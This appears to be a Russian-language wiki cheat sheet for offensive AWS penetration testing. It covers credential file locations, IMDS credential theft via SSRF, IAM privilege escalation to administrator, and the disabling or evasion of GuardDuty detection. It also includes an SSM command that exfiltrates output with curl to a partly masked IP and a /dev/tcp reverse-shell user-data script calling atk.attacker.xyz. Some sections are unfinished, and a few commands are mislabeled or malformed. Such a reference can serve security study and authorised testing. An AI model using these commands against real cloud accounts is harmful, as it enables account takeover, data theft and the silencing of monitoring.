|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:AddUserToGroup ====

Добавить пользователя в группу администраторов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name target_group --user-name my_username
</syntaxhighlight>

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

== AWS Shield ==

Сервис для защиты от DDoS.

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
